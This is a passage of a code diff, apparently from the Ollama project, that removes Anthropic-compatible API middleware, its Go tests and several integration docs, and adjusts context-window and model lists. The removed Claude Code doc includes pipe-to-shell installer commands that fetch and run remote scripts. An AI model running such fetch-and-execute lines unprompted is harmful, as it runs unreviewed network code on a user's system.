-              "/api/anthropic-compatibility"
+              "/api/openai-compatibility"
            ]
          },
          {
--- a/docs/faq.mdx
+++ b/docs/faq.mdx
@@ -22,7 +22,7 @@ Please refer to the [GPU docs](./gpu).

 ## How can I specify the context window size?

-By default, Ollama uses a context window size of 4096 tokens.
+By default, Ollama uses a context window size of 2048 tokens.

 This can be overridden with the `OLLAMA_CONTEXT_LENGTH` environment variable. For example, to set the default context window to 8K, use:

--- a/docs/images/marimo-add-model.png
+++ b/docs/images/marimo-add-model.png
--- a/docs/images/marimo-chat.png
+++ b/docs/images/marimo-chat.png
--- a/docs/images/marimo-code-completion.png
+++ b/docs/images/marimo-code-completion.png
--- a/docs/images/marimo-models.png
+++ b/docs/images/marimo-models.png
--- a/docs/images/marimo-settings.png
+++ b/docs/images/marimo-settings.png
--- a/docs/images/onyx-login.png
+++ b/docs/images/onyx-login.png
--- a/docs/images/onyx-ollama-form.png
+++ b/docs/images/onyx-ollama-form.png
--- a/docs/images/onyx-ollama-llm.png
+++ b/docs/images/onyx-ollama-llm.png
--- a/docs/images/onyx-query.png
+++ b/docs/images/onyx-query.png
--- a/docs/integrations/claude-code.mdx
+++ b/docs/integrations/claude-code.mdx
@@ -1,78 +0,0 @@
----
-title: Claude Code
----
-
-Claude Code is Anthropic's agentic coding tool that can read, modify, and execute code in your working directory. 
-
-Open models can be used with Claude Code through Ollama's Anthropic-compatible API, enabling you to use models such as `qwen3-coder`, `gpt-oss:20b`, or other models.
-
-![Claude Code with Ollama](https://files.ollama.com/claude-code.png)
-
-## Install
-
-Install [Claude Code](https://code.claude.com/docs/en/overview):
-
-<CodeGroup>
-
-```shell macOS / Linux
-curl -fsSL https://claude.ai/install.sh | bash
-```
-
-```powershell Windows
-irm https://claude.ai/install.ps1 | iex
-```
-
-</CodeGroup>
-
-## Usage with Ollama
-
-Claude Code connects to Ollama using the Anthropic-compatible API.
-
-1. Set the environment variables:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama
-export ANTHROPIC_BASE_URL=http://localhost:11434
-```
-
-2. Run Claude Code with an Ollama model:
-
-```shell
-claude --model gpt-oss:20b
-```
-
-Or run with environment variables inline:
-
-```shell
-ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 claude --model gpt-oss:20b
-```
-
-**Note:** Claude Code requires a large context window. We recommend at least 32K tokens. See the [context length documentation](/context-length) for how to adjust context length in Ollama.
-
-## Connecting to ollama.com
-
-1. Create an [API key](https://ollama.com/settings/keys) on ollama.com
-2. Set the environment variables:
-
-```shell
-export ANTHROPIC_BASE_URL=https://ollama.com
-export ANTHROPIC_API_KEY=<your-api-key>
-```
-
-3. Run Claude Code with a cloud model:
-
-```shell
-claude --model glm-4.7:cloud
-```
-
-## Recommended Models
-
-### Cloud models
-- `glm-4.7:cloud` - High-performance cloud model
-- `minimax-m2.1:cloud` - Fast cloud model
-- `qwen3-coder:480b` - Large coding model
-
-### Local models
-- `qwen3-coder` - Excellent for coding tasks
-- `gpt-oss:20b` - Strong general-purpose model
-- `gpt-oss:120b` - Larger general-purpose model for more complex tasks
--- a/docs/integrations/marimo.mdx
+++ b/docs/integrations/marimo.mdx
@@ -1,73 +0,0 @@
---
-title: marimo
---
-
-## Install
-
-Install [marimo](https://marimo.io). You can use `pip` or `uv` for this. You 
-can also use `uv` to create a sandboxed environment for marimo by running:
-
-```
-uvx marimo edit --sandbox notebook.py
-```
-
-## Usage with Ollama
-
-1. In marimo, go to the user settings and go to the AI tab. From here
-you can find and configure Ollama as an AI provider. For local use you
-would typically point the base url to `http://localhost:11434/v1`.
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-settings.png" 
-    alt="Ollama settings in marimo"
-    width="50%"
-  />
-</div>
-
-2. Once the AI provider is set up, you can turn on/off specific AI models you'd like to access. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-models.png" 
-    alt="Selecting an Ollama model"
-    width="50%"
-  />
-</div>
-
-3. You can also add a model to the list of available models by scrolling to the bottom and using the UI there. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-add-model.png" 
-    alt="Adding a new Ollama model"
-    width="50%"
-  />
-</div>
-
-4. Once configured, you can now use Ollama for AI chats in marimo.
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-chat.png" 
-    alt="Configure code completion"
-    width="50%"
-  />
-</div>
-
-4. Alternatively, you can now use Ollama for **inline code completion** in marimo. This can be configured in the "AI Features" tab. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-code-completion.png" 
-    alt="Configure code completion"
-    width="50%"
-  />
-</div>
-
-
-## Connecting to ollama.com
-
-1. Sign in to ollama cloud via `ollama signin` 
-2. In the ollama model settings add a model that ollama hosts, like `gpt-oss:120b`.
-3. You can now refer to this model in marimo!
--- a/docs/integrations/onyx.mdx
+++ b/docs/integrations/onyx.mdx
@@ -1,63 +0,0 @@
---
-title: Onyx
---
-
-## Overview
-[Onyx](http://onyx.app/) is a self-hostable Chat UI that integrates with all Ollama models. Features include:
- Creating custom Agents
- Web search
- Deep Research
- RAG over uploaded documents and connected apps
- Connectors to applications like Google Drive, Email, Slack, etc.
- MCP and OpenAPI Actions support
- Image generation
- User/Groups management, RBAC, SSO, etc.
-
-Onyx can be deployed for single users or large organizations.
-
-## Install Onyx
-
-Deploy Onyx with the [quickstart guide](https://docs.onyx.app/deployment/getting_started/quickstart).
-
-<Info>
-Resourcing/scaling docs [here](https://docs.onyx.app/deployment/getting_started/resourcing).
-</Info>
-
-## Usage with Ollama 
-
-1. Login to your Onyx deployment (create an account first).
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-login.png" 
-    alt="Onyx Login Page"
-    width="75%"
-  />
-</div>
-2. In the set-up process select `Ollama` as the LLM provider.
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-ollama-llm.png" 
-    alt="Onyx Set Up Form"
-    width="75%"
-  />
-</div>
-3. Provide your **Ollama API URL** and select your models.
-<Note>If you're running Onyx in Docker, to access your computer's local network use `http://host.docker.internal` instead of `http://127.0.0.1`.</Note>
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-ollama-form.png" 
-    alt="Selecting Ollama Models"
-    width="75%"
-  />
-</div>
-
-You can also easily connect up Onyx Cloud with the `Ollama Cloud` tab of the setup.
-
-## Send your first query
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-query.png" 
-    alt="Onyx Query Example"
-    width="75%"
-  />
-</div>
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -0,0 +1,3 @@
+# Troubleshooting
+
+For troubleshooting, see [https://docs.ollama.com/troubleshooting](https://docs.ollama.com/troubleshooting)
--- a/fs/ggml/ggml.go
+++ b/fs/ggml/ggml.go
@@ -269,7 +269,6 @@ func (kv KV) OllamaEngineRequired() bool {
 		"qwen25vl",
 		"qwen3", "qwen3moe",
 		"qwen3vl", "qwen3vlmoe",
-		"glm4moelite",
 	}, kv.Architecture())
 }

@@ -857,7 +856,6 @@ func (f GGML) FlashAttention() bool {
 	return slices.Contains([]string{
 		"bert",
 		"gemma3",
-		"glm4moelite",
 		"gptoss", "gpt-oss",
 		"mistral3",
 		"olmo3",
--- a/integration/tools_test.go
+++ b/integration/tools_test.go
@@ -131,7 +131,7 @@ func TestAPIToolCalling(t *testing.T) {
 					t.Errorf("unexpected tool called: got %q want %q", lastToolCall.Function.Name, "get_weather")
 				}

-				if _, ok := lastToolCall.Function.Arguments.Get("location"); !ok {
+				if _, ok := lastToolCall.Function.Arguments["location"]; !ok {
 					t.Errorf("expected tool arguments to include 'location', got: %s", lastToolCall.Function.Arguments.String())
 				}
 			case <-ctx.Done():
--- a/llm/server.go
+++ b/llm/server.go
@@ -1464,12 +1464,6 @@ type CompletionRequest struct {

 	// TopLogprobs specifies the number of most likely alternative tokens to return (0-20)
 	TopLogprobs int
-
-	// Image generation fields
-	Width  int32 `json:"width,omitempty"`
-	Height int32 `json:"height,omitempty"`
-	Steps  int32 `json:"steps,omitempty"`
-	Seed   int64 `json:"seed,omitempty"`
 }

 // DoneReason represents the reason why a completion response is done
@@ -1518,15 +1512,6 @@ type CompletionResponse struct {

 	// Logprobs contains log probability information if requested
 	Logprobs []Logprob `json:"logprobs,omitempty"`
-
-	// Image contains base64-encoded image data for image generation
-	Image string `json:"image,omitempty"`
-
-	// Step is the current step in image generation
-	Step int `json:"step,omitempty"`
-
-	// TotalSteps is the total number of steps for image generation
-	TotalSteps int `json:"total_steps,omitempty"`
 }

 func (s *llmServer) Completion(ctx context.Context, req CompletionRequest, fn func(CompletionResponse)) error {
--- a/middleware/anthropic.go
+++ b/middleware/anthropic.go
@@ -1,152 +0,0 @@
-package middleware
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-	"net/http"
-
-	"github.com/gin-gonic/gin"
-
-	"github.com/ollama/ollama/anthropic"
-	"github.com/ollama/ollama/api"
-)
-
-// AnthropicWriter wraps the response writer to transform Ollama responses to Anthropic format
-type AnthropicWriter struct {
-	BaseWriter
-	stream    bool
-	id        string
-	model     string
-	converter *anthropic.StreamConverter
-}
-
-func (w *AnthropicWriter) writeError(data []byte) (int, error) {
-	var errData struct {
-		Error string `json:"error"`
-	}
-	if err := json.Unmarshal(data, &errData); err != nil {
-		return 0, err
-	}
-
-	w.ResponseWriter.Header().Set("Content-Type", "application/json")
-	err := json.NewEncoder(w.ResponseWriter).Encode(anthropic.NewError(w.ResponseWriter.Status(), errData.Error))
-	if err != nil {
-		return 0, err
-	}
-
-	return len(data), nil
-}
-
-func (w *AnthropicWriter) writeEvent(eventType string, data any) error {
-	d, err := json.Marshal(data)
-	if err != nil {
-		return err
-	}
-	_, err = w.ResponseWriter.Write([]byte(fmt.Sprintf("event: %s\ndata: %s\n\n", eventType, d)))
-	if err != nil {
-		return err
-	}
-	if f, ok := w.ResponseWriter.(http.Flusher); ok {
-		f.Flush()
-	}
-	return nil
-}
-
-func (w *AnthropicWriter) writeResponse(data []byte) (int, error) {
-	var chatResponse api.ChatResponse
-	err := json.Unmarshal(data, &chatResponse)
-	if err != nil {
-		return 0, err
-	}
-
-	if w.stream {
-		w.ResponseWriter.Header().Set("Content-Type", "text/event-stream")
-
-		events := w.converter.Process(chatResponse)
-		for _, event := range events {
-			if err := w.writeEvent(event.Event, event.Data); err != nil {
-				return 0, err
-			}
-		}
-		return len(data), nil
-	}
-
-	w.ResponseWriter.Header().Set("Content-Type", "application/json")
-	response := anthropic.ToMessagesResponse(w.id, chatResponse)
-	return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
-}
-
-func (w *AnthropicWriter) Write(data []byte) (int, error) {
-	code := w.ResponseWriter.Status()
-	if code != http.StatusOK {
-		return w.writeError(data)
-	}
-
-	return w.writeResponse(data)
-}
-
-// AnthropicMessagesMiddleware handles Anthropic Messages API requests
-func AnthropicMessagesMiddleware() gin.HandlerFunc {
-	return func(c *gin.Context) {
-		var req anthropic.MessagesRequest
-		err := c.ShouldBindJSON(&req)
-		if err != nil {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
-			return
-		}
-
-		if req.Model == "" {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "model is required"))
-			return
-		}
-
-		if req.MaxTokens <= 0 {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "max_tokens is required and must be positive"))
-			return
-		}
-
-		if len(req.Messages) == 0 {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "messages is required"))
-			return
-		}
-
-		chatReq, err := anthropic.FromMessagesRequest(req)
-		if err != nil {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
-			return
-		}
-
-		// Set think to nil when being used with Anthropic API to connect to tools like claude code
-		c.Set("relax_thinking", true)
-
-		var b bytes.Buffer
-		if err := json.NewEncoder(&b).Encode(chatReq); err != nil {
-			c.AbortWithStatusJSON(http.StatusInternalServerError, anthropic.NewError(http.StatusInternalServerError, err.Error()))
-			return
-		}
-
-		c.Request.Body = io.NopCloser(&b)
-
-		messageID := anthropic.GenerateMessageID()
-
-		w := &AnthropicWriter{
-			BaseWriter: BaseWriter{ResponseWriter: c.Writer},
-			stream:     req.Stream,
-			id:         messageID,
-			model:      req.Model,
-			converter:  anthropic.NewStreamConverter(messageID, req.Model),
-		}
-
-		if req.Stream {
-			c.Writer.Header().Set("Content-Type", "text/event-stream")
-			c.Writer.Header().Set("Cache-Control", "no-cache")
-			c.Writer.Header().Set("Connection", "keep-alive")
-		}
-
-		c.Writer = w
-
-		c.Next()
-	}
-}
--- a/middleware/anthropic_test.go
+++ b/middleware/anthropic_test.go
@@ -1,607 +0,0 @@
-package middleware
-
-import (
-	"bytes"
-	"encoding/json"
-	"io"
-	"net/http"
-	"net/http/httptest"
-	"strings"
-	"testing"
-
-	"github.com/gin-gonic/gin"
-	"github.com/google/go-cmp/cmp"
-	"github.com/google/go-cmp/cmp/cmpopts"
-
-	"github.com/ollama/ollama/anthropic"
-	"github.com/ollama/ollama/api"
-)
-
-func captureAnthropicRequest(capturedRequest any) gin.HandlerFunc {
-	return func(c *gin.Context) {
-		bodyBytes, _ := io.ReadAll(c.Request.Body)
-		c.Request.Body = io.NopCloser(bytes.NewReader(bodyBytes))
-		_ = json.Unmarshal(bodyBytes, capturedRequest)
-		c.Next()
-	}
-}
-
-// testProps creates ToolPropertiesMap from a map (convenience function for tests)
-func testProps(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
-	props := api.NewToolPropertiesMap()
-	for k, v := range m {
-		props.Set(k, v)
-	}
-	return props
-}
-
-func TestAnthropicMessagesMiddleware(t *testing.T) {
-	type testCase struct {
-		name string
-		body string
-		req  api.ChatRequest
-		err  anthropic.ErrorResponse
-	}
-
-	var capturedRequest *api.ChatRequest
-	stream := true
-
-	testCases := []testCase{
-		{
-			name: "basic message",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with system prompt",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"system": "You are helpful.",
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "system", Content: "You are helpful."},
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with options",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 2048,
-				"temperature": 0.7,
-				"top_p": 0.9,
-				"top_k": 40,
-				"stop_sequences": ["\n", "END"],
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{
-					"num_predict": 2048,
-					"temperature": 0.7,
-					"top_p":       0.9,
-					"top_k":       40,
-					"stop":        []string{"\n", "END"},
-				},
-				Stream: &False,
-			},
-		},
-		{
-			name: "streaming",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"stream": true,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &stream,
-			},
-		},
-		{
-			name: "with tools",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "What's the weather?"}
-				],
-				"tools": [{
-					"name": "get_weather",
-					"description": "Get current weather",
-					"input_schema": {
-						"type": "object",
-						"properties": {
-							"location": {"type": "string"}
-						},
-						"required": ["location"]
-					}
-				}]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "What's the weather?"},
-				},
-				Tools: []api.Tool{
-					{
-						Type: "function",
-						Function: api.ToolFunction{
-							Name:        "get_weather",
-							Description: "Get current weather",
-							Parameters: api.ToolFunctionParameters{
-								Type:     "object",
-								Required: []string{"location"},
-								Properties: testProps(map[string]api.ToolProperty{
-									"location": {Type: api.PropertyType{"string"}},
-								}),
-							},
-						},
-					},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with tool result",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "What's the weather?"},
-					{"role": "assistant", "content": [
-						{"type": "tool_use", "id": "call_123", "name": "get_weather", "input": {"location": "Paris"}}
-					]},
-					{"role": "user", "content": [
-						{"type": "tool_result", "tool_use_id": "call_123", "content": "Sunny, 22°C"}
-					]}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "What's the weather?"},
-					{
-						Role: "assistant",
-						ToolCalls: []api.ToolCall{
-							{
-								ID: "call_123",
-								Function: api.ToolCallFunction{
-									Name:      "get_weather",
-									Arguments: testArgs(map[string]any{"location": "Paris"}),
-								},
-							},
-						},
-					},
-					{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call_123"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with thinking enabled",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"thinking": {"type": "enabled", "budget_tokens": 1000},
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-				Think:   &api.ThinkValue{Value: true},
-			},
-		},
-		{
-			name: "missing model error",
-			body: `{
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "model is required",
-				},
-			},
-		},
-		{
-			name: "missing max_tokens error",
-			body: `{
-				"model": "test-model",
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "max_tokens is required and must be positive",
-				},
-			},
-		},
-		{
-			name: "missing messages error",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "messages is required",
-				},
-			},
-		},
-		{
-			name: "tool_use missing id error",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "assistant", "content": [
-						{"type": "tool_use", "name": "test"}
-					]}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "tool_use block missing required 'id' field",
-				},
-			},
-		},
-	}
-
-	endpoint := func(c *gin.Context) {
-		c.Status(http.StatusOK)
-	}
-
-	gin.SetMode(gin.TestMode)
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware(), captureAnthropicRequest(&capturedRequest))
-	router.Handle(http.MethodPost, "/v1/messages", endpoint)
-
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(tc.body))
-			req.Header.Set("Content-Type", "application/json")
-
-			defer func() { capturedRequest = nil }()
-
-			resp := httptest.NewRecorder()
-			router.ServeHTTP(resp, req)
-
-			if tc.err.Type != "" {
-				// Expect error
-				if resp.Code == http.StatusOK {
-					t.Fatalf("expected error response, got 200 OK")
-				}
-				var errResp anthropic.ErrorResponse
-				if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-					t.Fatalf("failed to unmarshal error: %v", err)
-				}
-				if errResp.Type != tc.err.Type {
-					t.Errorf("expected error type %q, got %q", tc.err.Type, errResp.Type)
-				}
-				if errResp.Error.Type != tc.err.Error.Type {
-					t.Errorf("expected error.type %q, got %q", tc.err.Error.Type, errResp.Error.Type)
-				}
-				if errResp.Error.Message != tc.err.Error.Message {
-					t.Errorf("expected error.message %q, got %q", tc.err.Error.Message, errResp.Error.Message)
-				}
-				return
-			}
-
-			if resp.Code != http.StatusOK {
-				t.Fatalf("unexpected status code: %d, body: %s", resp.Code, resp.Body.String())
-			}
-
-			if capturedRequest == nil {
-				t.Fatal("request was not captured")
-			}
-
-			// Compare relevant fields
-			if capturedRequest.Model != tc.req.Model {
-				t.Errorf("model mismatch: got %q, want %q", capturedRequest.Model, tc.req.Model)
-			}
-
-			if diff := cmp.Diff(tc.req.Messages, capturedRequest.Messages,
-				cmpopts.IgnoreUnexported(api.ToolCallFunctionArguments{}, api.ToolPropertiesMap{})); diff != "" {
-				t.Errorf("messages mismatch (-want +got):\n%s", diff)
-			}
-
-			if tc.req.Stream != nil && capturedRequest.Stream != nil {
-				if *tc.req.Stream != *capturedRequest.Stream {
-					t.Errorf("stream mismatch: got %v, want %v", *capturedRequest.Stream, *tc.req.Stream)
-				}
-			}
-
-			if tc.req.Think != nil {
-				if capturedRequest.Think == nil {
-					t.Error("expected Think to be set")
-				} else if capturedRequest.Think.Value != tc.req.Think.Value {
-					t.Errorf("Think mismatch: got %v, want %v", capturedRequest.Think.Value, tc.req.Think.Value)
-				}
-			}
-		})
-	}
-}
-
-func TestAnthropicMessagesMiddleware_Headers(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	t.Run("streaming sets correct headers", func(t *testing.T) {
-		router := gin.New()
-		router.Use(AnthropicMessagesMiddleware())
-		router.POST("/v1/messages", func(c *gin.Context) {
-			// Check headers were set
-			if c.Writer.Header().Get("Content-Type") != "text/event-stream" {
-				t.Errorf("expected Content-Type text/event-stream, got %q", c.Writer.Header().Get("Content-Type"))
-			}
-			if c.Writer.Header().Get("Cache-Control") != "no-cache" {
-				t.Errorf("expected Cache-Control no-cache, got %q", c.Writer.Header().Get("Cache-Control"))
-			}
-			c.Status(http.StatusOK)
-		})
-
-		body := `{"model": "test", "max_tokens": 100, "stream": true, "messages": [{"role": "user", "content": "Hi"}]}`
-		req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-		req.Header.Set("Content-Type", "application/json")
-
-		resp := httptest.NewRecorder()
-		router.ServeHTTP(resp, req)
-	})
-}
-
-func TestAnthropicMessagesMiddleware_InvalidJSON(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		c.Status(http.StatusOK)
-	})
-
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(`{invalid json`))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if resp.Code != http.StatusBadRequest {
-		t.Errorf("expected status 400, got %d", resp.Code)
-	}
-
-	var errResp anthropic.ErrorResponse
-	if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-		t.Fatalf("failed to unmarshal error: %v", err)
-	}
-
-	if errResp.Type != "error" {
-		t.Errorf("expected type 'error', got %q", errResp.Type)
-	}
-	if errResp.Error.Type != "invalid_request_error" {
-		t.Errorf("expected error type 'invalid_request_error', got %q", errResp.Error.Type)
-	}
-}
-
-func TestAnthropicWriter_NonStreaming(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		// Simulate Ollama response
-		resp := api.ChatResponse{
-			Model: "test-model",
-			Message: api.Message{
-				Role:    "assistant",
-				Content: "Hello there!",
-			},
-			Done:       true,
-			DoneReason: "stop",
-			Metrics: api.Metrics{
-				PromptEvalCount: 10,
-				EvalCount:       5,
-			},
-		}
-		data, _ := json.Marshal(resp)
-		c.Writer.WriteHeader(http.StatusOK)
-		_, _ = c.Writer.Write(data)
-	})
-
-	body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if resp.Code != http.StatusOK {
-		t.Fatalf("expected status 200, got %d", resp.Code)
-	}
-
-	var result anthropic.MessagesResponse
-	if err := json.Unmarshal(resp.Body.Bytes(), &result); err != nil {
-		t.Fatalf("failed to unmarshal response: %v", err)
-	}
-
-	if result.Type != "message" {
-		t.Errorf("expected type 'message', got %q", result.Type)
-	}
-	if result.Role != "assistant" {
-		t.Errorf("expected role 'assistant', got %q", result.Role)
-	}
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
-		t.Errorf("expected text 'Hello there!', got %v", result.Content[0].Text)
-	}
-	if result.StopReason != "end_turn" {
-		t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
-	}
-	if result.Usage.InputTokens != 10 {
-		t.Errorf("expected input_tokens 10, got %d", result.Usage.InputTokens)
-	}
-	if result.Usage.OutputTokens != 5 {
-		t.Errorf("expected output_tokens 5, got %d", result.Usage.OutputTokens)
-	}
-}
-
-// TestAnthropicWriter_ErrorFromRoutes tests error handling when routes.go sends
-// gin.H{"error": "message"} without a StatusCode field (which is the common case)
-func TestAnthropicWriter_ErrorFromRoutes(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	tests := []struct {
-		name          string
-		statusCode    int
-		errorPayload  any
-		wantErrorType string
-		wantMessage   string
-	}{
-		// routes.go sends errors without StatusCode in JSON, so we must use HTTP status
-		{
-			name:          "404 with gin.H error (model not found)",
-			statusCode:    http.StatusNotFound,
-			errorPayload:  gin.H{"error": "model 'nonexistent' not found"},
-			wantErrorType: "not_found_error",
-			wantMessage:   "model 'nonexistent' not found",
-		},
-		{
-			name:          "400 with gin.H error (bad request)",
-			statusCode:    http.StatusBadRequest,
-			errorPayload:  gin.H{"error": "model is required"},
-			wantErrorType: "invalid_request_error",
-			wantMessage:   "model is required",
-		},
-		{
-			name:          "500 with gin.H error (internal error)",
-			statusCode:    http.StatusInternalServerError,
-			errorPayload:  gin.H{"error": "something went wrong"},
-			wantErrorType: "api_error",
-			wantMessage:   "something went wrong",
-		},
-		{
-			name:       "404 with api.StatusError",
-			statusCode: http.StatusNotFound,
-			errorPayload: api.StatusError{
-				StatusCode:   http.StatusNotFound,
-				ErrorMessage: "model not found via StatusError",
-			},
-			wantErrorType: "not_found_error",
-			wantMessage:   "model not found via StatusError",
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			router := gin.New()
-			router.Use(AnthropicMessagesMiddleware())
-			router.POST("/v1/messages", func(c *gin.Context) {
-				// Simulate what routes.go does - set status and write error JSON
-				data, _ := json.Marshal(tt.errorPayload)
-				c.Writer.WriteHeader(tt.statusCode)
-				_, _ = c.Writer.Write(data)
-			})
-
-			body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-			req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-			req.Header.Set("Content-Type", "application/json")
-
-			resp := httptest.NewRecorder()
-			router.ServeHTTP(resp, req)
-
-			if resp.Code != tt.statusCode {
-				t.Errorf("expected status %d, got %d", tt.statusCode, resp.Code)
-			}
-
-			var errResp anthropic.ErrorResponse
-			if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-				t.Fatalf("failed to unmarshal error response: %v\nbody: %s", err, resp.Body.String())
-			}
-
-			if errResp.Type != "error" {
-				t.Errorf("expected type 'error', got %q", errResp.Type)
-			}
-			if errResp.Error.Type != tt.wantErrorType {
-				t.Errorf("expected error type %q, got %q", tt.wantErrorType, errResp.Error.Type)
-			}
-			if errResp.Error.Message != tt.wantMessage {
-				t.Errorf("expected message %q, got %q", tt.wantMessage, errResp.Error.Message)
-			}
-		})
-	}
-}
-
-func TestAnthropicMessagesMiddleware_SetsRelaxThinkingFlag(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	var flagSet bool
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		_, flagSet = c.Get("relax_thinking")
-		c.Status(http.StatusOK)
-	})
-
-	body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if !flagSet {
-		t.Error("expected relax_thinking flag to be set in context")
-	}
-}
--- a/middleware/openai.go
